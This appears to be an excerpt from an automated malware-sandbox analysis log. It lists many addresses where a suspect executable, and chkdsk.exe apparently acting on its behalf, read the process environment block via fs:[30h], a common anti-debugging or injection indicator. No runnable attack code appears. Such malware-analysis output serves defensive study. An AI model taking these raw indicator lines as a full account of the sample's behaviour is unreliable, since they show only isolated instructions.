Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAA16
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAA16
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C8A0A mov eax, dword ptr fs:[00000030h] 18_2_1E3C8A0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC600
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E8E00 mov eax, dword ptr fs:[00000030h] 18_2_1E3E8E00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F927A mov eax, dword ptr fs:[00000030h] 18_2_1E3F927A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471608 mov eax, dword ptr fs:[00000030h] 18_2_1E471608
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C766D mov eax, dword ptr fs:[00000030h] 18_2_1E3C766D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46FE3F mov eax, dword ptr fs:[00000030h] 18_2_1E46FE3F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9240
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46FEC0 mov eax, dword ptr fs:[00000030h] 18_2_1E46FEC0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CAAB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EFAB0 mov eax, dword ptr fs:[00000030h] 18_2_1E3EFAB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488ED6 mov eax, dword ptr fs:[00000030h] 18_2_1E488ED6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h] 18_2_1E3ED294
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44FE87 mov eax, dword ptr fs:[00000030h] 18_2_1E44FE87
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2AE4 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2AE4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E16E0 mov ecx, dword ptr fs:[00000030h] 18_2_1E3E16E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C76E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3C76E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4346A7 mov eax, dword ptr fs:[00000030h] 18_2_1E4346A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h] 18_2_1E480EA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E36CC mov eax, dword ptr fs:[00000030h] 18_2_1E3E36CC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2ACB mov eax, dword ptr fs:[00000030h] 18_2_1E3E2ACB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F8EC7 mov eax, dword ptr fs:[00000030h] 18_2_1E3F8EC7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EE730 mov eax, dword ptr fs:[00000030h] 18_2_1E3EE730
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488B58 mov eax, dword ptr fs:[00000030h] 18_2_1E488B58
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h] 18_2_1E3B4F2E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488F6A mov eax, dword ptr fs:[00000030h] 18_2_1E488F6A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DF716 mov eax, dword ptr fs:[00000030h] 18_2_1E3DF716
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h] 18_2_1E3EA70E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h] 18_2_1E3E3B7A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h] 18_2_1E48070D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h] 18_2_1E44FF10
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BDB60 mov ecx, dword ptr fs:[00000030h] 18_2_1E3BDB60
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47131B mov eax, dword ptr fs:[00000030h] 18_2_1E47131B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CFF60 mov eax, dword ptr fs:[00000030h] 18_2_1E3CFF60
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BF358 mov eax, dword ptr fs:[00000030h] 18_2_1E3BF358
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BDB40 mov eax, dword ptr fs:[00000030h] 18_2_1E3BDB40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CEF40 mov eax, dword ptr fs:[00000030h] 18_2_1E3CEF40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h] 18_2_1E4353CA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h] 18_2_1E3E4BAD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C8794 mov eax, dword ptr fs:[00000030h] 18_2_1E3C8794
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2397 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2397
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EB390 mov eax, dword ptr fs:[00000030h] 18_2_1E3EB390
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h] 18_2_1E3C1B8F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46D380 mov ecx, dword ptr fs:[00000030h] 18_2_1E46D380
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F37F5 mov eax, dword ptr fs:[00000030h] 18_2_1E3F37F5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47138A mov eax, dword ptr fs:[00000030h] 18_2_1E47138A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DDBE9 mov eax, dword ptr fs:[00000030h] 18_2_1E3DDBE9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h] 18_2_1E437794
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E485BA5 mov eax, dword ptr fs:[00000030h] 18_2_1E485BA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EBC2C mov eax, dword ptr fs:[00000030h] 18_2_1E3EBC2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h] 18_2_1E44C450
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h] 18_2_1E3CB02A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E472073 mov eax, dword ptr fs:[00000030h] 18_2_1E472073
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481074 mov eax, dword ptr fs:[00000030h] 18_2_1E481074
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h] 18_2_1E48740D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h] 18_2_1E436C0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D746D mov eax, dword ptr fs:[00000030h] 18_2_1E3D746D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h] 18_2_1E437016
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h] 18_2_1E484015
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h] 18_2_1E3D0050
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA44B mov eax, dword ptr fs:[00000030h] 18_2_1E3EA44B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EF0BF mov ecx, dword ptr fs:[00000030h] 18_2_1E3EF0BF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h] 18_2_1E3EF0BF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F90AF mov eax, dword ptr fs:[00000030h] 18_2_1E3F90AF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488CD6 mov eax, dword ptr fs:[00000030h] 18_2_1E488CD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C849B mov eax, dword ptr fs:[00000030h] 18_2_1E3C849B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h] 18_2_1E436CF0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9080 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9080
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4714FB mov eax, dword ptr fs:[00000030h] 18_2_1E4714FB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h] 18_2_1E433884
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B58EC mov eax, dword ptr fs:[00000030h] 18_2_1E3B58EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E433540 mov eax, dword ptr fs:[00000030h] 18_2_1E433540
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h] 18_2_1E3E513A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h] 18_2_1E3E4D3B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAD30 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAD30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov ecx, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9100
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB171
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h] 18_2_1E3DC577
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC962 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC962
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D7D50 mov eax, dword ptr fs:[00000030h] 18_2_1E3D7D50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E43A537 mov eax, dword ptr fs:[00000030h] 18_2_1E43A537
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h] 18_2_1E3DB944
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488D34 mov eax, dword ptr fs:[00000030h] 18_2_1E488D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F3D43 mov eax, dword ptr fs:[00000030h] 18_2_1E3F3D43
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47E539 mov eax, dword ptr fs:[00000030h] 18_2_1E47E539
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov ecx, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h] 18_2_1E3E1DB5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E61A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E35A1 mov eax, dword ptr fs:[00000030h] 18_2_1E3E35A1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h] 18_2_1E3EFD9B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h] 18_2_1E47FDE2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4441E8 mov eax, dword ptr fs:[00000030h] 18_2_1E4441E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2990 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2990
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E468DF1 mov eax, dword ptr fs:[00000030h] 18_2_1E468DF1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA185 mov eax, dword ptr fs:[00000030h] 18_2_1E3EA185
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DC182 mov eax, dword ptr fs:[00000030h] 18_2_1E3DC182
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB1E1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CD5E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h] 18_2_1E4805AC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4369A6 mov eax, dword ptr fs:[00000030h] 18_2_1E4369A6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h] 18_2_1E4351BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A3D43 mov eax, dword ptr fs:[00000030h] 31_2_054A3D43
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3540 mov eax, dword ptr fs:[00000030h] 31_2_054E3540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05513D40 mov eax, dword ptr fs:[00000030h] 31_2_05513D40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05487D50 mov eax, dword ptr fs:[00000030h] 31_2_05487D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h] 31_2_0548C577
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538D34 mov eax, dword ptr fs:[00000030h] 31_2_05538D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552E539 mov eax, dword ptr fs:[00000030h] 31_2_0552E539
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h] 31_2_05494D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546AD30 mov eax, dword ptr fs:[00000030h] 31_2_0546AD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054EA537 mov eax, dword ptr fs:[00000030h] 31_2_054EA537
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov ecx, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05518DF1 mov eax, dword ptr fs:[00000030h] 31_2_05518DF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h] 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h] 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h] 31_2_0549FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h] 31_2_0549FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054935A1 mov eax, dword ptr fs:[00000030h] 31_2_054935A1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055305AC mov eax, dword ptr fs:[00000030h] 31_2_055305AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055305AC mov eax, dword ptr fs:[00000030h] 31_2_055305AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A44B mov eax, dword ptr fs:[00000030h] 31_2_0549A44B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h] 31_2_054FC450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h] 31_2_054FC450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548746D mov eax, dword ptr fs:[00000030h] 31_2_0548746D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549BC2C mov eax, dword ptr fs:[00000030h] 31_2_0549BC2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538CD6 mov eax, dword ptr fs:[00000030h] 31_2_05538CD6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055214FB mov eax, dword ptr fs:[00000030h] 31_2_055214FB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547849B mov eax, dword ptr fs:[00000030h] 31_2_0547849B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547EF40 mov eax, dword ptr fs:[00000030h] 31_2_0547EF40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547FF60 mov eax, dword ptr fs:[00000030h] 31_2_0547FF60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538F6A mov eax, dword ptr fs:[00000030h] 31_2_05538F6A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h] 31_2_0549A70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h] 31_2_0549A70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553070D mov eax, dword ptr fs:[00000030h] 31_2_0553070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553070D mov eax, dword ptr fs:[00000030h] 31_2_0553070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548F716 mov eax, dword ptr fs:[00000030h] 31_2_0548F716
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h] 31_2_054FFF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h] 31_2_054FFF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h] 31_2_05464F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h] 31_2_05464F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549E730 mov eax, dword ptr fs:[00000030h] 31_2_0549E730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A37F5 mov eax, dword ptr fs:[00000030h] 31_2_054A37F5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05478794 mov eax, dword ptr fs:[00000030h] 31_2_05478794
